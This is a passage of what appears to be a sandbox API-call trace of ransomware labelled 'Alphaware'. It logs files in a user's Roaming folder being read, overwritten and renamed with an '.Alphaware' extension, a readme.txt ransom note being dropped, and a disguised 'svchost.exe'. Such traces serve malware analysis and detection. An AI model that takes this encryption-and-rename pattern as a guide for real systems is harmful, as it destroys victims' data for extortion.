ftLastWriteTime.dwLowDateTime=0x18e72e90, ftLastWriteTime.dwHighDateTime=0x1d97677, nFileSizeHigh=0x0, nFileSizeLow=0x15648)) returned 1 [0091.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.623] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.623] ReadFile (in: hFile=0x250, lpBuffer=0x128357c8, nNumberOfBytesToRead=0x15648, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x128357c8*, lpNumberOfBytesRead=0x23eb38*=0x15648, lpOverlapped=0x0) returned 1 [0091.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.650] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0090960, ftCreationTime.dwHighDateTime=0x1d97671, ftLastAccessTime.dwLowDateTime=0x18e72e90, ftLastAccessTime.dwHighDateTime=0x1d97677, ftLastWriteTime.dwLowDateTime=0x88d4ef60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c934)) returned 1 [0091.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.657] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wY-iL 75UNFS8BKTR.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wy-il 75unfs8bktr.wav.alphaware")) returned 1 [0091.658] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3", dwFileAttributes=0x80) returned 1 [0091.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0091.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3"), fInfoLevelId=0x0, lpFileInformation=0x25c8a30 | out: lpFileInformation=0x25c8a30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7ad4b00, ftCreationTime.dwHighDateTime=0x1d967d6, ftLastAccessTime.dwLowDateTime=0x10434c10, ftLastAccessTime.dwHighDateTime=0x1d96d99, ftLastWriteTime.dwLowDateTime=0x10434c10, ftLastWriteTime.dwHighDateTime=0x1d96d99, nFileSizeHigh=0x0, nFileSizeLow=0x13f7c)) returned 1 [0091.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0091.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0091.659] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0091.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0091.659] ReadFile (in: hFile=0x250, lpBuffer=0x25c8cc8, nNumberOfBytesToRead=0x13f7c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25c8cc8*, lpNumberOfBytesRead=0x23eb38*=0x13f7c, lpOverlapped=0x0) returned 1 [0091.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0091.695] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0091.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0091.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0091.701] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad4b00, ftCreationTime.dwHighDateTime=0x1d967d6, ftLastAccessTime.dwLowDateTime=0x10434c10, ftLastAccessTime.dwHighDateTime=0x1d96d99, ftLastWriteTime.dwLowDateTime=0x88dc1380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aac8)) returned 1 [0091.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0091.701] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\z2r-DGhdhEVsMRYoTz.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\z2r-dghdhevsmryotz.mp3.alphaware")) returned 1 [0091.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0091.702] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x88dc1380, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x88dc1380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f5de560, ftCreationTime.dwHighDateTime=0x1d96b60, ftLastAccessTime.dwLowDateTime=0xb152f8c0, ftLastAccessTime.dwHighDateTime=0x1d9705b, ftLastWriteTime.dwLowDateTime=0x87f78f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x190a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kv--h785b9BKHr7X8.mkv.Alphaware", cAlternateFileName="0KV--H~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45e0b60, ftCreationTime.dwHighDateTime=0x1d9753c, ftLastAccessTime.dwLowDateTime=0x746b5210, ftLastAccessTime.dwHighDateTime=0x1d975ae, ftLastWriteTime.dwLowDateTime=0x880cfbe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="2cvjqDL8AbrH.rtf.Alphaware", cAlternateFileName="2CVJQD~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe439c690, ftCreationTime.dwHighDateTime=0x1d97134, ftLastAccessTime.dwLowDateTime=0x259485f0, ftLastAccessTime.dwHighDateTime=0x1d973d1, ftLastWriteTime.dwLowDateTime=0x88142000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XrQR lLdHFDJW8qX.jpg.Alphaware", cAlternateFileName="2XRQRL~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5278740, ftCreationTime.dwHighDateTime=0x1d96847, ftLastAccessTime.dwLowDateTime=0x49b29620, ftLastAccessTime.dwHighDateTime=0x1d96c7e, ftLastWriteTime.dwLowDateTime=0x881b4420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ord0oMkDdqdZwcFM7PM.mkv.Alphaware", cAlternateFileName="7ORD0O~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a40bb0, ftCreationTime.dwHighDateTime=0x1d966d8, ftLastAccessTime.dwLowDateTime=0xe2e64df0, ftLastAccessTime.dwHighDateTime=0x1d96b75, ftLastWriteTime.dwLowDateTime=0x88226840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b274, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcoFPdLUL2Wyq3ljkzb.jpg.Alphaware", cAlternateFileName="ACOFPD~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3abec40, ftCreationTime.dwHighDateTime=0x1d96663, ftLastAccessTime.dwLowDateTime=0xe45c7b40, ftLastAccessTime.dwHighDateTime=0x1d96a59, ftLastWriteTime.dwLowDateTime=0x88272b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x112f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNR8T.csv.Alphaware", cAlternateFileName="BNR8TC~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d1a3db0, ftCreationTime.dwHighDateTime=0x1d97660, ftLastAccessTime.dwLowDateTime=0x3aacbce0, ftLastAccessTime.dwHighDateTime=0x1d97684, ftLastWriteTime.dwLowDateTime=0x882bedc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="EGL9Rx1KXSqWh.mkv.Alphaware", cAlternateFileName="EGL9RX~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6219390, ftCreationTime.dwHighDateTime=0x1d975e1, ftLastAccessTime.dwLowDateTime=0x40ed0d40, ftLastAccessTime.dwHighDateTime=0x1d975e8, ftLastWriteTime.dwLowDateTime=0x883311e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x68b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV-dKx26kEi.pdf.Alphaware", cAlternateFileName="GV-DKX~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b8c57d0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x13ee9c00, ftLastAccessTime.dwHighDateTime=0x1d97548, ftLastWriteTime.dwLowDateTime=0x8837d4a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x195c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="I4JmLhoyXMGmJxztkf.wav.Alphaware", cAlternateFileName="I4JMLH~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6490b000, ftCreationTime.dwHighDateTime=0x1d97569, ftLastAccessTime.dwLowDateTime=0x53d8b4f0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0x883c9760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x153f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Im_qpwMGCe7SuRoN0aBx.m4a.Alphaware", cAlternateFileName="IM_QPW~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c8c540, ftCreationTime.dwHighDateTime=0x1d96bc9, ftLastAccessTime.dwLowDateTime=0x3f0789c0, ftLastAccessTime.dwHighDateTime=0x1d97119, ftLastWriteTime.dwLowDateTime=0x8843bb80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c474, dwReserved0=0x0, dwReserved1=0x0, cFileName="JhfS93kCXhB0dS47UXO.swf.Alphaware", cAlternateFileName="JHFS93~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b07e7b0, ftCreationTime.dwHighDateTime=0x1d96df0, ftLastAccessTime.dwLowDateTime=0x2eaf0d00, ftLastAccessTime.dwHighDateTime=0x1d97204, ftLastWriteTime.dwLowDateTime=0x88487e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdaf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPY6Y vdnrHDp.mp3.Alphaware", cAlternateFileName="JPY6YV~1.ALP")) returned 1 [0091.703] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe55f0720, ftCreationTime.dwHighDateTime=0x1d9736d, ftLastAccessTime.dwLowDateTime=0xaad61ba0, ftLastAccessTime.dwHighDateTime=0x1d974c8, ftLastWriteTime.dwLowDateTime=0x884fa260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9b74, dwReserved0=0x0, dwReserved1=0x0, cFileName="kz1HaTIACtkD69pq32M.m4a.Alphaware", cAlternateFileName="KZ1HAT~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x112bcfa0, ftCreationTime.dwHighDateTime=0x1d96eff, ftLastAccessTime.dwLowDateTime=0x6e2e85a0, ftLastAccessTime.dwHighDateTime=0x1d9701f, ftLastWriteTime.dwLowDateTime=0x88546520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="lKBIj-DLGhLH.m4a.Alphaware", cAlternateFileName="LKBIJ-~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43607cb0, ftCreationTime.dwHighDateTime=0x1d970a2, ftLastAccessTime.dwLowDateTime=0xa419cf40, ftLastAccessTime.dwHighDateTime=0x1d97479, ftLastWriteTime.dwLowDateTime=0x885b8940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20234, dwReserved0=0x0, dwReserved1=0x0, cFileName="NbYVLogs.m4a.Alphaware", cAlternateFileName="NBYVLO~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe08ef420, ftCreationTime.dwHighDateTime=0x1d96f1d, ftLastAccessTime.dwLowDateTime=0x9c844920, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x8862ad60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3874, dwReserved0=0x0, dwReserved1=0x0, cFileName="N_rlN0Z3nRhZqdxj JZI.rtf.Alphaware", cAlternateFileName="N_RLN0~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab045dc0, ftCreationTime.dwHighDateTime=0x1d96fc9, ftLastAccessTime.dwLowDateTime=0x334e8d50, ftLastAccessTime.dwHighDateTime=0x1d97497, ftLastWriteTime.dwLowDateTime=0x88677020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10160, dwReserved0=0x0, dwReserved1=0x0, cFileName="ObWS3XW5aMy2t2Z9HK.wav.Alphaware", cAlternateFileName="OBWS3X~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b7ed130, ftCreationTime.dwHighDateTime=0x1d96cab, ftLastAccessTime.dwLowDateTime=0x55987f50, ftLastAccessTime.dwHighDateTime=0x1d96d7c, ftLastWriteTime.dwLowDateTime=0x886c32e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x48a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpTfQfUJeEHeOaQm.bmp.Alphaware", cAlternateFileName="PPTFQF~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa540c80, ftCreationTime.dwHighDateTime=0x1d9722c, ftLastAccessTime.dwLowDateTime=0xd845e210, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x8870f5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa134, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPz0ItX4f1x.avi.Alphaware", cAlternateFileName="PPZ0IT~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7d7730, ftCreationTime.dwHighDateTime=0x1d972b2, ftLastAccessTime.dwLowDateTime=0xf5008f20, ftLastAccessTime.dwHighDateTime=0x1d97523, ftLastWriteTime.dwLowDateTime=0x8875b860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d674, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUZ1Gae4SGu.mp3.Alphaware", cAlternateFileName="PUZ1GA~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87f9f0e0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87f9f0e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87f9f0e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324af9c0, ftCreationTime.dwHighDateTime=0x1d97307, ftLastAccessTime.dwLowDateTime=0xd4993220, ftLastAccessTime.dwHighDateTime=0x1d97422, ftLastWriteTime.dwLowDateTime=0x887a7b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8660, dwReserved0=0x0, dwReserved1=0x0, cFileName="rKqcydSq.mkv.Alphaware", cAlternateFileName="RKQCYD~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9e6ed0, ftCreationTime.dwHighDateTime=0x1d9683a, ftLastAccessTime.dwLowDateTime=0xe10b9eb0, ftLastAccessTime.dwHighDateTime=0x1d968fd, ftLastWriteTime.dwLowDateTime=0x887f3de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ZDF Lucr_Z28Spu.swf.Alphaware", cAlternateFileName="S8ZDFL~1.ALP")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74412c80, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x74412c80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="svchost.exe", cAlternateFileName="")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcc414f0, ftCreationTime.dwHighDateTime=0x1d96d66, ftLastAccessTime.dwLowDateTime=0x84ce7f10, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x8888c360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12d08, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2oMmxPi.flv.Alphaware", cAlternateFileName="T2OMMX~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00a9e30, ftCreationTime.dwHighDateTime=0x1d975d5, ftLastAccessTime.dwLowDateTime=0x470975e0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0x888fe780, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="te-nH.flv.Alphaware", cAlternateFileName="TE-NHF~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580760, ftCreationTime.dwHighDateTime=0x1d968a2, ftLastAccessTime.dwLowDateTime=0xcd70dc50, ftLastAccessTime.dwHighDateTime=0x1d96c66, ftLastWriteTime.dwLowDateTime=0x8894aa40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="UK0_T4zjWaC.wav.Alphaware", cAlternateFileName="UK0_T4~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a905870, ftCreationTime.dwHighDateTime=0x1d96a6e, ftLastAccessTime.dwLowDateTime=0xe2a8e0, ftLastAccessTime.dwHighDateTime=0x1d96fad, ftLastWriteTime.dwLowDateTime=0x88bd21a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf0a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vaZJJgsh9Q1-hrf7S7.avi.Alphaware", cAlternateFileName="VAZJJG~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4463a60, ftCreationTime.dwHighDateTime=0x1d9672e, ftLastAccessTime.dwLowDateTime=0x7fff2d40, ftLastAccessTime.dwHighDateTime=0x1d9674e, ftLastWriteTime.dwLowDateTime=0x88c1e460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCNVmrhf2U7XXJBaxRmB.pps.Alphaware", cAlternateFileName="VCNVMR~1.ALP")) returned 1 [0091.705] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c85ce0, ftCreationTime.dwHighDateTime=0x1d968eb, 